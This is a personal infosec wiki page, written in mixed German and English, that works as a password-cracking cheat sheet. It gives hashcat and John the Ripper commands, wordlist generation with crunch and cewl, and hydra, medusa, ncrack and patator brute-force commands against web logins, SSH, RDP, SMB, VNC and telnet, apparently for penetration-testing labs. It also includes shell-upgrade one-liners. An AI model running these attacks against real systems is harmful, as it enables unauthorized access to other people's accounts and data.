akde/infosec

Information security is ultimately about managing risk

Passwort cracking

, , , , , , , , , , , , , ,

(!) See also Pass­word spray­ing to check a obtained pass­word against usernames.

  1. Check hash against dbs: 
    1. https://hashkiller.co.uk
    2. https://hashes.org/
    3. https://crackstation.net/
    4. https://www.onlinehashcrack.com/
    5. https://www.hashes.org/
  2. Define own wordlist first, if e.g. a web site is avail­able (cewl!)
  3. Use a pre­de­fined wordlist
  4. crack.

Note: Use http://rumkin.com/tools/cipher/ if you have to encode/decrypt/decipher some­thing on the fly.

Wordlist optimization

If there is a pass­word pol­i­cy known:

  • Remove all pass­words from the list which does not sat­is­fy the requirements.
  • Build an own wordlist with the pol­i­cy rules.

Check password policy

In Win­dows, type

net accounts

to get infor­ma­tions about account lock­ing, lock­out threash­olds etc.

Cloud-based performance cracking

See NPK

Default passwords

Hashcat

Am schnell­sten auf iMac:

/opt/hashcat/hashcat -m1800 -a0 -O --self-test-disable -r /opt/hashcat/rules/best66.rule test.hash /opt/wordlists/rockyou.txt 

/opt/hashcat/hashcat -m1800 -a0 -O --self-test-disable -r /opt/hashcat/rules/rockyou-30000.rule test.hash /opt/wordlists/rockyou.txt

Note: You can add mul­ti­ple wordlists!

Fort­set­zen, wenn vorher mit ‑c unter­brochen wurde:

/opt/hashcat/hashcat --session name_der_sitzung --restore

Typ eines Hashs ermitteln:

hashid <hash_dollar_maskieren>
hash-identifier

Show hashs and search formats:

hashcat --sample-hashes | grep $9$

Para­me­ters:

  • -a <attack_mode>
 0 = Straight
1 = Combination
2 = Toggle-Case
3 = Brute-force
4 = Permutation
5 = Table-Lookup
8 = Prince
  • -m <hash_type>
man hashcat
       1600 = Apache MD5 (for htaccess, althought there are also other formats)
       1800 = SHA-512(Unix)

Hash for­mats: https://hashcat.net/wiki/doku.php?id=example_hashes

Modify wordlists with rules

Hash­cat can parse .rule files which describe trans­for­ma­tions of the wordlist. Each line in a rule file defines one transformation.

An exam­ple, where each word becomes three words:

$ cat list1.rule
$1
c
$!

Anoth­er exam­ple, where each word stays one word, only that the rules are applied:

$ cat list1.rule
$1 c $!

This file leads to the trans­for­ma­tion of every word by

  • adding a 1 after each word,
  • cap­i­tal­iz­ing each word and
  • adding a ! at the end of each word.

The fol­low­ing com­mand prints the changed wordlist:

hashcat -r list.rule --stdout list.txt

Note: In the /usr/share/hashcat/rules/ are many exam­ple rules. See https://hashcat.net/wiki/doku.php?id=rule_based_attack for all operations.

Hash determination

hash-identifier

Bekommt einen Hash und rät das Verfahren.

Wordlist creation

crunch

Erstellt Kom­bi­na­tio­nen von Zeichen.

crunch <min> <max> <zeichenmenge> -o out.txt

z.B. erstellt crunch 2 3 0123456789 ‑o /tmp/o.txt alle Kom­bi­na­tio­nen aus Zahlen von zwei bis drei Stellen.

Crunch kann auch Pass­wörter nach Mustern erstellen. Das kann sehr sin­nvoll sein, wenn man z.B. die Pass­wort-Richtlin­ien ken­nt oder die Pass­wörter in ihrer Struk­tur son­st ein­schränken kann.

crunch 8 8 -t ,@@^^%%% // siehe Offsec-PDF, Seite 269

cewl

cewl can crawl sites and extract can­di­dates for pass­words which can then be used to cre­ate pass­word with pat­tern. (m = Min­i­mum word length, d = recur­sive fol­low depth)

cewl -m 6 -d 1 www.megacorpone.com > megacorp-cewl.txt

Use John to mutate a wordlist. OR use pw-inspec­tor to fil­ter the list to obtain only can­di­dates which com­plies with known pass­word rules.

pw-inspector -i cewl.txt -m 6 -M 20

John the ripper

JTR John the rip­per can cre­ate vari­a­tions of pass­word lists which were cre­at­ed e.g. with cewl.

https://countuponsecurity.files.wordpress.com/2016/09/jtr-cheat-sheet.pdf

./john –wordlist=/tmp/wl –rules:Extra –std­out > /tmp/customwordlist

./john –wordlist=/opt/rockyou.txt /tmp/zip.hash dont forget!!!!!!!!

john --wordlist=megacorp-cewl.txt --rules --stdout > mutated.txt

This applies the default muta­tion rules. To e.g. add two dig­its after each pass­word, add in /etc/john/john.conf in the sec­tion [List.Rules:Wordlist] the fol­low­ing two lines:

# Add one number to the end of each password
$[0-9]
# Add two numbers to the end of each password
$[0-9]$[0-9]

Note: See https://null-byte.wonderhowto.com/forum/to-use-multiple-threads-cpus-while-cracking-passwords-with-john-ripper-free-version-0187017/ for opti­miza­tion for all cpu cores.

Brute force

Medusa

Medusa under­stands many pro­to­cols which can be test­ed against wordlists. Can be used for FTP, HTTPSSH, …

Does­n’t seem to work with vir­tu­al hosts!

medusa -h $victim -u admin -P password-file.txt -M http -m DIR:/admin -T 10
medusa \
  -h 10.11.1.44 \
  -u admin \
  -P /usr/share/wordlists/rockyou.txt \
  -M web-form \
  -m FORM:"admin" \
  -m DENY-SIGNAL:"invalid password" \
  -m FORM-DATA:"post?u=&password=&send=%2Fadmin%2Fsite&login="
medusa -h $victim -u bethany -P Dog_Names_normalized.txt -M http -m DIR:/Admin -T 2

ncrack

High-speed crack­ing, faster than medusa in one exam­ple. Can also brute force Win­dows RDP.

ncrack -vv --user offsec -P password-file.txt rdp://$victim

Hydra

Note: xHy­dra can be used for configuration!

NOTE: http-post-form!

Also high-speed

hydra -P password-file.txt -v $victim snmp

Anoth­er exam­ple which per­forms HTTP post requests. After the URL and “:”, the post body is defined. After anoth­er “:” a string which indi­cates that the login attemp was failed.

hydra $victim http-post-form "/admin/index.php:user=^USER^&pw=^PASS^:Wrong password" -l admin -P /usr/share/wordlists/rockyou.txt -t 10 -w 30

If this does­n’t work, a Vhost can also be added via a host head­er like :H=Host\: <vhost>

Anoth­er exam­ple which checks the head­er of the response (to check the state, use S=302)

hydra staging-order.mango.htb http-post-form "/:username=^USER^&password=^PASS^:H=location: home.php" -l admin -P /usr/share/wordlists/rockyou.txt -t 20 -w 30

Attack SMB/Samba:

hydra -l marko -P /usr/share/wordlists/rockyou.txt $victim smb

Add cook­ies to requests:

hydra $victim http-post-form "/bolt/bolt/login:user_login%5Busername%5D=^USER^&user_login%5Bpassword%5D=^PASS^&user_login%5Blogin%5D=&user_login%5B_token%5D=-UKrYiVKX6bHmuQbPI75IgdiBVf2FgPpxUpjpj352i4:F=Please check your input:H=Cookie: bolt_session_274a029ed9ae3bfc27bd20e0afcafdcc=871d6acbc17c5822417b1cb094" -l admin -P /usr/share/wordlists/rockyou.txt -t 10 -w 30

Exam­ple with proxy and SSL (Burp)

HYDRA_PROXY_HTTPS=https://localhost:8080/ hydra $victim http-post-form "/admin:password=^PASS^&send=%2Fadmin%2Fsite&login=&gg=^USER^:F=invalid password:H=Cookie: session_id_issue_tracker=192.168.119.158-e1a56146-27a4-4946-b4a8-4fdf399e106a; session_id_admin=192.168.119.158-0436a0f5-f902-44de-8f80-8cf4567671e6" -l "" -P /usr/share/wordlists/rockyou.txt -t 10 -w 30 -S -I -s 8000

Tel­net

hydra -P passwords.txt -L users.txt $victim telnet -V
hydra -C users_and_passwords.txt $victim telnet -V

SSH

hydra $target ssh -l eleanor -P /usr/share/wordlists/rockyou.txt

FTP

hydra -C users_and_passwords2.txt ftp://$victim

MySQL

hydra -C users_and_passwords2.txt mysql://$victim

SMTP

hydra -P /usr/share/wordlists/rockyou.txt -l root $target smtp -V

RDP

hydra -P /usr/share/wordlists/rockyou.txt -l albert rdp://192.168.165.227

Or, pass­word spray­ing the oth­er way round:

hydra -L dirb/others/names.txt -p "SuperPasswordFoundSomewhere" rdp://192.168.165.202

Patator

Break RDP Remote Desk­top login

patator rdp_login host=$victim user='Maria' password=FILE0 0=/usr/share/wordlists/rockyou.txt.ascii

Break VNC login

patator vnc_login host=$victim password=FILE0 0=/usr/share/wordlists/rockyou.txt.ascii -t 1 -x retry:fgrep!='Authentication failure' --max-retries -1 -x quit:code=0

Break tel­net

patator telnet_login host=$victim inputs='FILE0\nFILE1' 0=users.txt 1=passwords.txt persistent=0 prompt_re='Username:|Password:' -x ignore:egrep='Login incorrect.+Username:'

Protocols

Crack OpenSSH identity keys

Con­vert the id_rsa file

python /usr/share/john/ssh2john.py id_rsa > /tmp/id_rsa.hash

Run JtR:

john /tmp/id_rsa.hash -wordlist=/usr/share/wordlists/rockyou.txt

Run John The Rip­per with rules:

  1. Add rules to /etc/john/john.conf:
    [List.Rules:sshRules]
    c $1 $3 $7 $!
    c $1 $3 $7 $@
    c $1 $3 $7 $#
  2. Exe­cute
    john /tmp/id_rsa.hash -wordlist=/usr/share/wordlists/rockyou.txt --rules=sshRules

File formats

PDF

pdfcrack --wordlist=/usr/share/wordlists/rockyou.txt $filename

or

/usr/share/john/pdf2john.pl file.pdf > /tmp/pdf.hash
john /tmp/pdf.hash

ZIP

/usr/share/john/zip2john.pl file.zip > /tmp/zip.hash
john /tmp/zip.hash // iterative
john -wordlist:/usr/share/wordlists/rockyou.txt /tmp/zip.hash // with wordlist
while cracking, have a look into the file names with vi zip.zip

fcrackzip [-D ‑p /usr/share/wordlists/rockyou.txt] t.zip

RAR

/usr/share/john/rar2john.pl file.rar > /tmp/rar.hash
john /tmp/zip.hash

Links and various notes

Leave a Reply

About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.

Checklists

Categories

Checklists: Ports

python -c 'import pty;pty.spawn("/bin/bash")';

python3 -c 'import pty;pty.spawn("/bin/bash")';